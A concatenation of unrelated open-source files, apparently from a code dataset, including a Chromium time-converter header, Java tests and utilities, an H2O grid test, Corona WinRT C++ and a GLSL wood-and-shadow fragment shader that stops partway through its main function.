TimeTicks are not always consistent between processes as // indicated by |TimeTicks::IsConsistentAcrossProcesses()|. Often, the values on // one process have a static offset relative to another. Occasionally, these // offsets shift while running. // // To combat this, any TimeTicks values sent from the remote process to the // local process must be tweaked in order to appear monotonic. 
// // In order to properly tweak ticks, we need 4 reference points: // // - |local_lower_bound|: A known point, recorded on the local process, that // occurs before any remote values that will be // converted. // - |remote_lower_bound|: The equivalent point on the remote process. This // should be recorded immediately after // |local_lower_bound|. // - |local_upper_bound|: A known point, recorded on the local process, that // occurs after any remote values that will be // converted. // - |remote_upper_bound|: The equivalent point on the remote process. This // should be recorded immediately before // |local_upper_bound|. // // Once these bounds are determined, values within the remote process's range // can be converted to the local process's range. The values are converted as // follows: // // 1. If the remote's range exceeds the local's range, it is scaled to fit. // Any values converted will have the same scale factor applied. // // 2. The remote's range is shifted so that it is centered within the // local's range. Any values converted will be shifted the same amount. class BLINK_COMMON_EXPORT InterProcessTimeTicksConverter { public: InterProcessTimeTicksConverter(LocalTimeTicks local_lower_bound, LocalTimeTicks local_upper_bound, RemoteTimeTicks remote_lower_bound, RemoteTimeTicks remote_upper_bound); // Returns the value within the local's bounds that correlates to // |remote_ms|. LocalTimeTicks ToLocalTimeTicks(RemoteTimeTicks remote_ms) const; // Returns the equivalent delta after applying remote-to-local scaling to // |remote_delta|. LocalTimeDelta ToLocalTimeDelta(RemoteTimeDelta remote_delta) const; // Returns the (remote time) - (local time) difference estimated by the // converter. This is the constant that is subtracted from remote TimeTicks to // get local TimeTicks when no scaling is applied. base::TimeDelta GetSkewForMetrics() const; private: // The local time which |remote_lower_bound_| is mapped to. 
LocalTimeTicks local_base_time_; LocalTimeDelta local_range_; double range_conversion_rate_; RemoteTimeTicks remote_lower_bound_; RemoteTimeTicks remote_upper_bound_; }; } // namespace blink #endif // THIRD_PARTY_BLINK_PUBLIC_COMMON_LOADER_INTER_PROCESS_TIME_TICKS_CONVERTER_H_
2,310
310
// Copyright (C) 2002-2011 <NAME> // This file is part of the "Irrlicht Engine". // For conditions of distribution and use, see copyright notice in irrlicht.h #ifndef __C_IRR_DEVICE_CONSOLE_H_INCLUDED__ #define __C_IRR_DEVICE_CONSOLE_H_INCLUDED__ #include "IrrCompileConfig.h" #ifdef _IRR_COMPILE_WITH_CONSOLE_DEVICE_ #include "CIrrDeviceStub.h" #include "IrrlichtDevice.h" #include "ICursorControl.h" namespace irr { class CIrrDeviceConsole : public CIrrDeviceStub { public: CIrrDeviceConsole(const SIrrlichtCreationParameters& param); virtual ~CIrrDeviceConsole(); virtual bool run(); virtual void yield(); virtual void sleep(u32 timeMs, bool pauseTimer = false); virtual void setWindowCaption(const wchar_t* text); virtual bool present(video::IImage* surface, void* windowId, core::rect<s32>* srcClip); virtual bool isWindowActive() const; virtual bool isWindowFocused() const; virtual bool isWindowMinimized() const; virtual void closeDevice(); virtual void setResizable(bool resize = false); virtual void minimizeWindow(); virtual void maximizeWindow(); virtual void restoreWindow(); virtual core::position2di getWindowPosition(); virtual E_DEVICE_TYPE getType() const; private: void createDriver(); video::SExposedVideoData& getExposedVideoData(); bool Focused; bool Initialized; bool Paused; bool Close; video::SExposedVideoData ExposedVideoData; }; } // end namespace irr #endif #endif
504
5,133
/* * Copyright MapStruct Authors. * * Licensed under the Apache License version 2.0, available at http://www.apache.org/licenses/LICENSE-2.0 */ package org.mapstruct.ap.test.conversion.nativetypes; import org.mapstruct.ap.testutil.IssueKey; import org.mapstruct.ap.testutil.ProcessorTest; import org.mapstruct.ap.testutil.WithClasses; import static org.assertj.core.api.Assertions.assertThat; @WithClasses({ BooleanSource.class, BooleanTarget.class, BooleanMapper.class }) public class BooleanConversionTest { @ProcessorTest public void shouldApplyBooleanConversion() { BooleanSource source = new BooleanSource(); source.setB( true ); source.setBool( true ); BooleanTarget target = BooleanMapper.INSTANCE.sourceToTarget( source ); assertThat( target ).isNotNull(); assertThat( target.getB() ).isEqualTo( Boolean.TRUE ); assertThat( target.getBool() ).isEqualTo( Boolean.TRUE ); } @ProcessorTest public void shouldApplyReverseBooleanConversion() { BooleanTarget target = new BooleanTarget(); target.setB( Boolean.TRUE ); target.setBool( Boolean.TRUE ); BooleanSource source = BooleanMapper.INSTANCE.targetToSource( target ); assertThat( source ).isNotNull(); assertThat( source.isB() ).isEqualTo( true ); assertThat( source.getBool() ).isEqualTo( true ); } @ProcessorTest @IssueKey( "229" ) public void wrapperToPrimitiveIsNullSafe() { BooleanTarget target = new BooleanTarget(); BooleanSource source = BooleanMapper.INSTANCE.targetToSource( target ); assertThat( source ).isNotNull(); } }
619
1,780
package com.twitter.inject.annotations; import java.lang.annotation.ElementType; import java.lang.annotation.Retention; import java.lang.annotation.Target; import static java.lang.annotation.RetentionPolicy.RUNTIME; @Retention(RUNTIME) @Target({ElementType.FIELD, ElementType.PARAMETER, ElementType.METHOD}) @MarkerAnnotation public @interface Thing { /** Name of the thing */ String value(); }
126
937
package cyclops.function; import com.oath.cyclops.hkt.Higher; import lombok.AllArgsConstructor; import java.util.Comparator; import static cyclops.function.Ord.Ordering.*; public interface Ord<W,T> { public enum Ordering {LESS, EQUAL, MORE} Ordering compare(Higher<W,T> first, Higher<W,T> second); public static <W,T> Ord<W,T> ord(Comparator<Higher<W,T>> comp){ return new OrdByComparotor(comp); } @AllArgsConstructor public static class OrdByComparotor<W,T> implements Ord<W,T>{ private final Comparator<Higher<W,T>> comp; @Override public Ordering compare(Higher<W, T> first, Higher<W, T> second) { int pos = comp.compare(first,second); if(pos < 0) return LESS; if(pos>0) return MORE; return EQUAL; } } }
390
3,212
/* * Licensed to the Apache Software Foundation (ASF) under one or more * contributor license agreements. See the NOTICE file distributed with * this work for additional information regarding copyright ownership. * The ASF licenses this file to You under the Apache License, Version 2.0 * (the "License"); you may not use this file except in compliance with * the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package org.apache.nifi.controller.queue; import org.apache.nifi.controller.repository.FlowFileRecord; import org.apache.nifi.controller.repository.claim.ContentClaim; import org.apache.nifi.flowfile.FlowFilePrioritizer; import java.io.Serializable; import java.util.ArrayList; import java.util.Comparator; import java.util.List; public class QueuePrioritizer implements Comparator<FlowFileRecord>, Serializable { private static final long serialVersionUID = 1L; private final transient List<FlowFilePrioritizer> prioritizers = new ArrayList<>(); public QueuePrioritizer(final List<FlowFilePrioritizer> priorities) { if (null != priorities) { prioritizers.addAll(priorities); } } @Override public int compare(final FlowFileRecord f1, final FlowFileRecord f2) { int returnVal = 0; final boolean f1Penalized = f1.isPenalized(); final boolean f2Penalized = f2.isPenalized(); if (f1Penalized && !f2Penalized) { return 1; } else if (!f1Penalized && f2Penalized) { return -1; } if (f1Penalized && f2Penalized) { if (f1.getPenaltyExpirationMillis() < f2.getPenaltyExpirationMillis()) { return -1; } else if (f1.getPenaltyExpirationMillis() > f2.getPenaltyExpirationMillis()) { return 1; } } if (!prioritizers.isEmpty()) { for 
(final FlowFilePrioritizer prioritizer : prioritizers) { returnVal = prioritizer.compare(f1, f2); if (returnVal != 0) { return returnVal; } } } final ContentClaim claim1 = f1.getContentClaim(); final ContentClaim claim2 = f2.getContentClaim(); // put the one without a claim first if (claim1 == null && claim2 != null) { return -1; } else if (claim1 != null && claim2 == null) { return 1; } else if (claim1 != null && claim2 != null) { final int claimComparison = claim1.compareTo(claim2); if (claimComparison != 0) { return claimComparison; } final int claimOffsetComparison = Long.compare(f1.getContentClaimOffset(), f2.getContentClaimOffset()); if (claimOffsetComparison != 0) { return claimOffsetComparison; } } return Long.compare(f1.getId(), f2.getId()); } }
1,323
6,098
import sys
import os

sys.path.insert(1, os.path.join("..", "..", ".."))
import h2o
from tests import pyunit_utils
from h2o.grid.grid_search import H2OGridSearch
from h2o.estimators.gbm import H2OGradientBoostingEstimator


def grid_resume():
    """Train a GBM grid on iris, export it to HDFS, reload it after wiping
    cluster state, and verify that resuming training adds no models (the
    grid was already complete for the given hyper-parameter space).
    """
    train = h2o.import_file(path=pyunit_utils.locate("smalldata/iris/iris_wheader.csv"))
    hyper_parameters = {
        "learn_rate": [0.1, 0.01, .05],
        "ntrees": [10, 20]
    }
    export_dir = 'hdfs:///user/jenkins/grid_export_py'
    gs = H2OGridSearch(H2OGradientBoostingEstimator, hyper_params=hyper_parameters)
    gs.train(x=list(range(4)), y=4, training_frame=train)
    grid_id = gs.grid_id
    old_grid_model_count = len(gs.model_ids)
    print("Baseline grid has %d models" % old_grid_model_count)
    saved_path = h2o.save_grid(export_dir, grid_id)
    # Wipe all cluster state so the reload below starts from a clean slate.
    h2o.remove_all()
    train = h2o.import_file(path=pyunit_utils.locate("smalldata/iris/iris_wheader.csv"))
    grid = h2o.load_grid(saved_path)
    assert grid is not None
    assert len(grid.model_ids) == old_grid_model_count
    # Resuming training on a fully-built grid must not create new models.
    grid.train(x=list(range(4)), y=4, training_frame=train)
    # Fixed message typo: "grained" -> "trained".
    print("Newly trained grid has %d models" % len(grid.model_ids))
    assert len(grid.model_ids) == old_grid_model_count


if __name__ == "__main__":
    pyunit_utils.standalone_test(grid_resume)
else:
    grid_resume()
565
30,023
"""Tests for the Airzone integration."""
11
1,968
<gh_stars>1000+
//////////////////////////////////////////////////////////////////////////////
//
// This file is part of the Corona game engine.
// For overview and more information on licensing please refer to README.md
// Home page: https://github.com/coronalabs/corona
// Contact: <EMAIL>
//
//////////////////////////////////////////////////////////////////////////////

#include "pch.h"
#include "CoronaBoxedString.h"
#include "CoronaBoxedBoolean.h"
#include "CoronaBoxedNumber.h"
extern "C"
{
#	include "lua.h"
}

namespace CoronaLabs { namespace Corona { namespace WinRT {

// Immutable WinRT ref class that boxes one string value, keeping both a
// UTF-16 (Platform::String) and a UTF-8 copy so it can be handed to either
// WinRT APIs or Lua without repeated conversion.

#pragma region Consructors/Destructors
// Boxes a UTF-16 string; the UTF-8 copy is derived from it immediately.
CoronaBoxedString::CoronaBoxedString(Platform::String^ utf16String)
{
	fUtf16String = utf16String;
	fUtf8String = CoronaLabs::WinRT::Utf8String::From(utf16String);
}

// Boxes a UTF-8 string; throws on null, then derives the UTF-16 copy.
CoronaBoxedString::CoronaBoxedString(CoronaLabs::WinRT::Utf8String^ utf8String)
{
	if (nullptr == utf8String)
	{
		throw ref new Platform::NullReferenceException();
	}
	fUtf8String = utf8String;
	fUtf16String = utf8String->ToString();
}

#pragma endregion


#pragma region Public Instance Methods/Properties
// Returns the cached UTF-8 form of the boxed string.
CoronaLabs::WinRT::Utf8String^ CoronaBoxedString::ToUtf8String()
{
	return fUtf8String;
}

// Returns the cached UTF-16 form of the boxed string.
Platform::String^ CoronaBoxedString::ToUtf16String()
{
	return fUtf16String;
}

// Standard ToString(); same value as ToUtf16String().
Platform::String^ CoronaBoxedString::ToString()
{
	return fUtf16String;
}

// Compares against a UTF-8 string via the cached UTF-8 copy.
bool CoronaBoxedString::Equals(CoronaLabs::WinRT::Utf8String^ value)
{
	return fUtf8String->Equals(value);
}

// Compares against a UTF-16 string via the cached UTF-16 copy.
bool CoronaBoxedString::Equals(Platform::String^ value)
{
	return fUtf16String->Equals(value);
}

// General object equality: accepts Platform::String, Utf8String, or another
// CoronaBoxedString (matched by reference identity or string content above).
bool CoronaBoxedString::Equals(Platform::Object^ value)
{
	// Not equal if null.
	if (nullptr == value)
	{
		return false;
	}

	// Equal if the references match.
	if (Platform::Object::ReferenceEquals(this, value))
	{
		return true;
	}

	// Do a UTF-16 comparison if applicable.
	auto utf16String = dynamic_cast<Platform::String^>(value);
	if (utf16String)
	{
		return Equals(utf16String);
	}

	// Do a UTF-8 comparison if applicable.
	auto utf8String = dynamic_cast<CoronaLabs::WinRT::Utf8String^>(value);
	if (utf8String)
	{
		return Equals(utf8String);
	}

	// The given object type cannot be compared with this class. Not equal.
	return false;
}

// Orders boxed values: null < booleans/numbers < strings; two strings are
// compared ordinally by their UTF-16 contents.
int CoronaBoxedString::CompareTo(Platform::Object^ value)
{
	// Return "greater" if given a null reference.
	if (nullptr == value)
	{
		return 1;
	}

	// This object is always greater than the other Corona boxed value types.
	auto coronaBoxedBoolean = dynamic_cast<CoronaBoxedBoolean^>(value);
	if (coronaBoxedBoolean)
	{
		return 1;
	}
	auto coronaBoxedNumber = dynamic_cast<CoronaBoxedNumber^>(value);
	if (coronaBoxedNumber)
	{
		return 1;
	}

	// Compare UTF-16 strings.
	auto coronaBoxedString = dynamic_cast<CoronaBoxedString^>(value);
	if (coronaBoxedString)
	{
		return Platform::String::CompareOrdinal(fUtf16String, coronaBoxedString->fUtf16String);
	}
	return Platform::String::CompareOrdinal(fUtf16String, value->ToString());
}

// Hash of the boxed value; delegates to the UTF-16 string so it is
// consistent with the UTF-16 equality path above.
int CoronaBoxedString::GetHashCode()
{
	return fUtf16String->GetHashCode();
}

// Pushes the boxed string onto the Lua stack whose lua_State pointer is
// given as a raw address. Returns false only for a zero/null address.
bool CoronaBoxedString::PushToLua(int64 luaStateMemoryAddress)
{
	// Validate argument.
	if (0 == luaStateMemoryAddress)
	{
		return false;
	}

	// Push this object's string to the top of the Lua stack.
	auto luaStatePointer = (lua_State*)luaStateMemoryAddress;
	lua_pushstring(luaStatePointer, fUtf8String->Data);
	return true;
}

#pragma endregion


#pragma region Public Static Functions/Properties
// Shared pre-allocated empty-string instance (function-local static).
CoronaBoxedString^ CoronaBoxedString::Empty::get()
{
	static CoronaBoxedString kEmpty(CoronaLabs::WinRT::Utf8String::Empty);
	return %kEmpty;
}

// Factory from UTF-16; empty inputs return the shared Empty instance.
CoronaBoxedString^ CoronaBoxedString::From(Platform::String^ value)
{
	// If the given string is empty, then return the pre-allocated empty version of this class.
	if (value->IsEmpty())
	{
		return CoronaBoxedString::Empty;
	}

	// Return an object boxing the given string.
	return ref new CoronaBoxedString(value);
}

// Factory from UTF-8; null or empty inputs return the shared Empty instance.
CoronaBoxedString^ CoronaBoxedString::From(CoronaLabs::WinRT::Utf8String^ value)
{
	// If the given string is null/empty, then return the pre-allocated empty version of this class.
	if (!value || value->IsEmpty)
	{
		return CoronaBoxedString::Empty;
	}

	// Return an object boxing the given string.
	return ref new CoronaBoxedString(value);
}

#pragma endregion

} } }	// namespace CoronaLabs::Corona::WinRT
1,470
3,673
<reponame>jaeh/IncludeOS
#include <os.hpp>
#include <kernel.hpp>

// Public os:: API accessors; each forwards to the kernel:: layer.

// Whether the kernel has completed its boot sequence.
bool os::is_booted() noexcept {
  return kernel::is_booted();
}

// Name of the CPU architecture this image was built for.
const char* os::arch() noexcept {
  return Arch::name;
}

// Currently configured action taken on kernel panic.
os::Panic_action os::panic_action() noexcept {
  return kernel::panic_action();
}

// Configure the action taken on kernel panic.
void os::set_panic_action(Panic_action action) noexcept {
  kernel::set_panic_action(action);
}

// Returns the span of Multiboot modules handed over by the bootloader,
// or an empty span when no boot info / modules are available.
os::Span_mods os::modules()
{
  auto* bootinfo_ = kernel::bootinfo();
  // Modules are only valid when boot info exists, the MODS flag is set,
  // and the bootloader reported a non-zero module count.
  if (bootinfo_ and bootinfo_->flags & MULTIBOOT_INFO_MODS and bootinfo_->mods_count)
  {
    // Span_mods uses a signed count; guard the narrowing cast below.
    Expects(bootinfo_->mods_count < std::numeric_limits<int>::max());

    return os::Span_mods {
      reinterpret_cast<os::Module*>(bootinfo_->mods_addr),
      static_cast<int>(bootinfo_->mods_count)
    };
  }
  return {};
}
296
2,372
// Fragment shader: procedural wood-plank texturing plus spot lighting with
// cascaded shadow maps, sky-box ambient/reflection and fog.
// NOTE(review): uses legacy built-ins (texture3D, shadow2DArray, gl_TexCoord,
// gl_FragColor) and HLSL-style lerp() - presumably compiled with a
// compatibility profile and a host-provided lerp definition; confirm.

uniform sampler3D ttt3D;
uniform float extraNoiseScale = 1.0f;
uniform float noiseScale = 0.03f;

// 1D/2D noise lookups into the tiled 3D noise texture, in [0,1].
float noise(float p) { return texture3D(ttt3D, vec3(p*noiseScale*extraNoiseScale, 0.5, 0.5)).x; }
float noise(float p, float q) { return texture3D(ttt3D, vec3(p*noiseScale*extraNoiseScale, q*noiseScale*extraNoiseScale, 0.5)).x; }
// Signed variants remapped to [-1,1].
float snoise(float p) { return noise(p)*2.0f - 1.0f; }
float snoise(float p, float q) { return noise(p, q)*2.0f - 1.0f; }
// Linear step between a and b, clamped to [0,1].
float boxstep(float a, float b, float x) { return (clamp(((x)-(a)) / ((b)-(a)), 0, 1)); }

// Wood-material parameters (RenderMan-style plank shader).
uniform float Ka = 1;
uniform float Kd = 0.75;
uniform float Ks = 0.15;
uniform float roughness = 0.025;
uniform vec3 specularcolor = vec3(1, 1, 1);
uniform float ringscale = 0;
uniform float grainscale = 0;
uniform float txtscale = 1;
uniform float plankspertile = 4;
uniform vec3 lightwood = vec3(0.57, 0.292, 0.125);
uniform vec3 darkwood = vec3(0.275, 0.15, 0.06);
uniform vec3 groovecolor = vec3(.05, .04, .015);
//uniform float plankwidth = .05;
uniform float plankwidth = .2;
uniform float groovewidth = 0.001;
uniform float plankvary = 0.8;
uniform float grainy = 1;
uniform float wavy = 0.08;
uniform float MINFILTERWIDTH = 1.0e-7;

// Procedural antialiased wood-plank color for point p (p.xy used as s-t).
vec3 myTexture3D_0(vec3 p)
{
	float r;
	float r2;
	float whichrow;
	float whichplank;
	float swidth;
	float twidth;
	float fwidth;
	float ss;
	float tt;
	float w;
	float h;
	float fade;
	float ttt;
	vec3 Ct;
	vec3 woodcolor;
	float groovy;
	float PGWIDTH;
	float PGHEIGHT;
	float GWF;
	float GHF;
	float tilewidth;
	float whichtile;
	float tmp;
	float planklength;

	PGWIDTH = plankwidth + groovewidth;
	planklength = PGWIDTH * plankspertile - groovewidth;
	PGHEIGHT = planklength + groovewidth;
	GWF = groovewidth*0.5 / PGWIDTH;
	GHF = groovewidth*0.5 / PGHEIGHT;

	// Determine how wide in s-t space one pixel projects to
	float s = p.x;
	float t = p.y;
	float du = 1.0;
	float dv = 1.0;
	swidth = (max(abs(dFdx(s)*du) + abs(dFdy(s)*dv), MINFILTERWIDTH) / PGWIDTH) * txtscale;
	twidth = (max(abs(dFdx(t)*du) + abs(dFdy(t)*dv), MINFILTERWIDTH) / PGHEIGHT) * txtscale;
	fwidth = max(swidth, twidth);

	ss = (txtscale * s) / PGWIDTH;
	whichrow = floor(ss);
	tt = (txtscale * t) / PGHEIGHT;
	whichplank = floor(tt);
	// Alternate plank orientation on every other row/plank (swap s and t).
	if (mod(whichrow / plankspertile + whichplank, 2) >= 1) {
		ss = txtscale * t / PGWIDTH;
		whichrow = floor(ss);
		tt = txtscale * s / PGHEIGHT;
		whichplank = floor(tt);
		tmp = swidth;
		swidth = twidth;
		twidth = tmp;
	}
	ss -= whichrow;
	tt -= whichplank;
	whichplank += 20 * (whichrow + 10);

	// Antialiased groove mask: w/h fade toward 0 inside the grooves.
	if (swidth >= 1)
		w = 1 - 2 * GWF;
	else
		w = clamp(boxstep(GWF - swidth, GWF, ss), max(1 - GWF / swidth, 0), 1) - clamp(boxstep(1 - GWF - swidth, 1 - GWF, ss), 0, 2 * GWF / swidth);
	if (twidth >= 1)
		h = 1 - 2 * GHF;
	else
		h = clamp(boxstep(GHF - twidth, GHF, tt), max(1 - GHF / twidth, 0), 1) - clamp(boxstep(1 - GHF - twidth, 1 - GHF, tt), 0, 2 * GHF / twidth);
	// This would be the non-antialiased version:
	//w = step (GWF,ss) - step(1-GWF,ss);
	//h = step (GHF,tt) - step(1-GHF,tt);
	groovy = w*h;

	// Add the ring patterns
	fade = smoothstep(1 / ringscale, 8 / ringscale, fwidth);
	if (fade < 0.999) {
		ttt = tt / 4 + whichplank / 28.38 + wavy * noise(8 * ss, tt / 4);
		r = ringscale * noise(ss - whichplank, ttt);
		r -= floor(r);
		r = 0.3 + 0.7*smoothstep(0.2, 0.55, r)*(1 - smoothstep(0.75, 0.8, r));
		r = (1 - fade)*r + 0.65*fade;

		// Multiply the ring pattern by the fine grain
		fade = smoothstep(2 / grainscale, 8 / grainscale, fwidth);
		if (fade < 0.999) {
			r2 = 1.3 - noise(ss*grainscale, (tt*grainscale / 4));
			r2 = grainy * r2*r2 + (1 - grainy);
			r *= (1 - fade)*r2 + (0.75*fade);
		}
		else
			r *= 0.75;
	}
	else
		r = 0.4875;

	// Mix the light and dark wood according to the grain pattern
	woodcolor = lerp(lightwood, darkwood, r);

	// Add plank-to-plank variation in overall color
	woodcolor *= (1 - plankvary / 2 + plankvary * noise(whichplank + 0.5));

	Ct = lerp(groovecolor, woodcolor, groovy);
	return Ct;
}

// Signed 3D noise lookup in [-1,1].
float noise3D_1(vec3 p) { return texture3D(ttt3D, p).x*2.0f - 1.0f; }

// Fractal turbulence: sum of |noise| octaves with the given lacunarity/gain.
float turbulence_1(vec3 p, int octaves, float lacunarity, float gain)
{
	float freq = 1.0f;
	float amp = 0.8f;
	float sum = 0.0f;
	for (int i = 0; i<octaves; i++) {
		sum += abs(noise3D_1(p*freq))*amp;
		freq *= lacunarity;
		amp *= gain;
	}
	return sum;
}

// Smooth spike of width w centered at c, peaking at 1 when x == c.
float spike_1(float c, float w, float x) { return smoothstep(c - w, c, x) * smoothstep(c + w, c, x); }

// Alternative procedural material: turbulence-blended sandy tones.
vec3 myTexture3D_1(vec3 p)
{
	float noiseScale = 0.1f*extraNoiseScale;
	float noise = turbulence_1(p*noiseScale, 3, 3.0f, 0.5f);
	//noise = turbulence(p*noiseScale + vec3(noise, noise, noise*0.3)*0.01f, 8, 3.0f, 0.5f);
	//noise = spike(0.35f, 0.05f, noise);
	//noise = noise;
	vec3 base = lerp(vec3(164, 148, 108)*1.63 / 255, vec3(178, 156, 126)*1.73 / 255, spike_1(0.5f, 0.3f, turbulence_1(p*noiseScale*0.7f + vec3(noise*0.5, noise, noise)*0.011f, 2, 2.0f, 0.5f)));
	//vec3 b2 = lerp(base, vec3(0.0f, 0.0f, 0.0f), noise);
	vec3 b2 = lerp(base, vec3(173, 160, 121)*1.73 / 255, noise);
	return b2*0.75f;
}

// Selects a base color by material ID; the procedural textures above are
// currently disabled in favor of flat colors.
vec3 myTexture3DCom(vec3 p, float mat)
{
	// Depend on material ID
	if (mat < 0.5f) {
		//return myTexture3D_0(p);
		return vec3(173, 160, 151) *0.85/ 255;
		//return lightwood*1.3;
	}
	else if (mat < 1.5f) {
		//return myTexture3D_1(p);
		return vec3(173, 100, 21)*1.73 / 255;
	}
	else {
		return vec3(1.0f, 0.0f, 0.0f);
	}
}

// scene reflection
uniform float reflectionCoeff = 0.0f;
uniform float specularCoeff = 0.0f;
uniform sampler2DRect reflectionTex;

// Shadow map
uniform float shadowAmbient = 0.0;
uniform float hdrScale = 5.0;
uniform sampler2D texture;
uniform sampler2DArrayShadow stex;
uniform sampler2DArrayShadow stex2;
uniform sampler2DArrayShadow stex3;
uniform samplerCube skyboxTex;
uniform vec2 texSize; // x - size, y - 1/size
uniform vec4 far_d;   // cascade split depths for the shadow-map array

// Spot lights
uniform vec3 spotLightDir;
uniform vec3 spotLightPos;
uniform float spotLightCosineDecayBegin;
uniform float spotLightCosineDecayEnd;
uniform vec3 spotLightDir2;
uniform vec3 spotLightPos2;
uniform float spotLightCosineDecayBegin2;
uniform float spotLightCosineDecayEnd2;
uniform vec3 spotLightDir3;
uniform vec3 spotLightPos3;
uniform float spotLightCosineDecayBegin3;
uniform float spotLightCosineDecayEnd3;
uniform vec3 parallelLightDir;
uniform float shadowAdd;
uniform int useTexture;
uniform int numShadows;
uniform float roughnessScale;
uniform vec3 ambientColor;
uniform sampler2DArray diffuseTexArray;
uniform sampler2DArray bumpTexArray;
uniform sampler2DArray specularTexArray;
uniform sampler2DArray emissiveReflectSpecPowerTexArray;
uniform vec2 shadowTaps[12];

// Shadow factor for light 1: picks a cascade by fragment depth, then takes
// a 6-tap disc PCF average; radius shrinks for the farther cascades.
float shadowCoeff1(float bscale)
{
	int index = 3;
	if(gl_FragCoord.z < far_d.x)
		index = 0;
	else if(gl_FragCoord.z < far_d.y)
		index = 1;
	else if(gl_FragCoord.z < far_d.z)
		index = 2;

	vec4 shadow_coord = gl_TextureMatrix[index]*vec4(gl_TexCoord[1].xyz, 1);
	shadow_coord.w = shadow_coord.z + shadowAdd*bscale;
	// tell glsl in which layer to do the look up
	shadow_coord.z = float(index);

	// Gaussian 3x3 filter
	// return shadow2DArray(stex, shadow_coord).x;
	/*
	const float X = 1.0f;
	float ret = shadow2DArray(stex, shadow_coord).x * 0.25;
	ret += shadow2DArrayOffset(stex, shadow_coord, ivec2( -X, -X)).x * 0.0625;
	ret += shadow2DArrayOffset(stex, shadow_coord, ivec2( -X, 0)).x * 0.125;
	ret += shadow2DArrayOffset(stex, shadow_coord, ivec2( -X, X)).x * 0.0625;
	ret += shadow2DArrayOffset(stex, shadow_coord, ivec2( 0, -X)).x * 0.125;
	ret += shadow2DArrayOffset(stex, shadow_coord, ivec2( 0, X)).x * 0.125;
	ret += shadow2DArrayOffset(stex, shadow_coord, ivec2( X, -X)).x * 0.0625;
	ret += shadow2DArrayOffset(stex, shadow_coord, ivec2( X, 0)).x * 0.125;
	ret += shadow2DArrayOffset(stex, shadow_coord, ivec2( X, X)).x * 0.0625;
	return ret;*/

	const int numTaps = 6;
	float radius = 0.0003f/pow(2,index);
	float s = 0.0f;
	for (int i = 0; i < numTaps; i++)
	{
		s += shadow2DArray(stex, shadow_coord + vec4(shadowTaps[i] * radius, 0.0f, 0.0f)).r;
	}
	s /= numTaps;
	return s;
}

// Shadow factor for light 2: fixed cascade matrix, 3x3 Gaussian PCF on stex2.
float shadowCoeff2()
{
	const int index = 1;
	//int index = 3;
	//if(gl_FragCoord.z < far_d.x)
	//	index = 0;
	//else if(gl_FragCoord.z < far_d.y)
	//	index = 1;
	//else if(gl_FragCoord.z < far_d.z)
	//	index = 2;
	vec4 shadow_coord = gl_TextureMatrix[index]*vec4(gl_TexCoord[1].xyz, 1);
	shadow_coord.w = shadow_coord.z + shadowAdd;
	shadow_coord.z = float(0);
	// return shadow2DArray(stex, shadow_coord).x;
	const float X = 1.0f;
	float ret = shadow2DArray(stex2, shadow_coord).x * 0.25;
	ret += shadow2DArrayOffset(stex2, shadow_coord, ivec2( -X, -X)).x * 0.0625;
	ret += shadow2DArrayOffset(stex2, shadow_coord, ivec2( -X, 0)).x * 0.125;
	ret += shadow2DArrayOffset(stex2, shadow_coord, ivec2( -X, X)).x * 0.0625;
	ret += shadow2DArrayOffset(stex2, shadow_coord, ivec2( 0, -X)).x * 0.125;
	ret += shadow2DArrayOffset(stex2, shadow_coord, ivec2( 0, X)).x * 0.125;
	ret += shadow2DArrayOffset(stex2, shadow_coord, ivec2( X, -X)).x * 0.0625;
	ret += shadow2DArrayOffset(stex2, shadow_coord, ivec2( X, 0)).x * 0.125;
	ret += shadow2DArrayOffset(stex2, shadow_coord, ivec2( X, X)).x * 0.0625;
	return ret;
}

// Shadow factor for light 3: fixed cascade matrix, 3x3 Gaussian PCF on stex3.
float shadowCoeff3()
{
	const int index = 2;
	//int index = 3;
	//if(gl_FragCoord.z < far_d.x)
	//	index = 0;
	//else if(gl_FragCoord.z < far_d.y)
	//	index = 1;
	//else if(gl_FragCoord.z < far_d.z)
	//	index = 2;
	vec4 shadow_coord = gl_TextureMatrix[index]*vec4(gl_TexCoord[1].xyz, 1);
	shadow_coord.w = shadow_coord.z + shadowAdd;
	shadow_coord.z = float(0);
	// return shadow2DArray(stex, shadow_coord).x;
	const float X = 1.0f;
	float ret = shadow2DArray(stex3, shadow_coord).x * 0.25;
	ret += shadow2DArrayOffset(stex3, shadow_coord, ivec2( -X, -X)).x * 0.0625;
	ret += shadow2DArrayOffset(stex3, shadow_coord, ivec2( -X, 0)).x * 0.125;
	ret += shadow2DArrayOffset(stex3, shadow_coord, ivec2( -X, X)).x * 0.0625;
	ret += shadow2DArrayOffset(stex3, shadow_coord, ivec2( 0, -X)).x * 0.125;
	ret += shadow2DArrayOffset(stex3, shadow_coord, ivec2( 0, X)).x * 0.125;
	ret += shadow2DArrayOffset(stex3, shadow_coord, ivec2( X, -X)).x * 0.0625;
	ret += shadow2DArrayOffset(stex3, shadow_coord, ivec2( X, 0)).x * 0.125;
	ret += shadow2DArrayOffset(stex3, shadow_coord, ivec2( X, X)).x * 0.0625;
	return ret;
}

uniform float RollOff = 0.5f;

uniform float fresnelBias = 0.0;
uniform float fresnelScale = 1.0;
uniform float fresnelPower = 3.0; // 5.0 is physically correct

void main()
{
	// Debug visualization of the cascade index (disabled).
	/*
	int index = 3;
	if(gl_FragCoord.z < far_d.x)
		index = 0;
	else if(gl_FragCoord.z < far_d.y)
		index = 1;
	else if(gl_FragCoord.z < far_d.z)
		index = 2;
	if (index == 3) gl_FragColor = vec4(1,0,0,1);
	if (index == 2) gl_FragColor = vec4(0,1,0,1);
	if (index == 1) gl_FragColor = vec4(0,0,1,1);
	if (index == 0) gl_FragColor = vec4(1,1,0,1);
	return;*/

	// Debug visualization of the shadow coordinate (disabled).
	/*
	int index = 3;
	if(gl_FragCoord.z < far_d.x)
		index = 0;
	else if(gl_FragCoord.z < far_d.y)
		index = 1;
	else if(gl_FragCoord.z < far_d.z)
		index = 2;
	vec4 shadow_coord = gl_TextureMatrix[index]*vec4(gl_TexCoord[1].xyz, 1);
	shadow_coord.w = shadow_coord.z + shadowAdd;
	// tell glsl in which layer to do the look up
	shadow_coord.z = float(index)*0.33333333f;
	gl_FragColor = vec4(shadow_coord.xyz,1.0f);
	return;
	*/

	//// TODO, expose this as user parameter
	const float skyLightIntensity = 0.2;
	const float rimLightIntensity = 0.3;

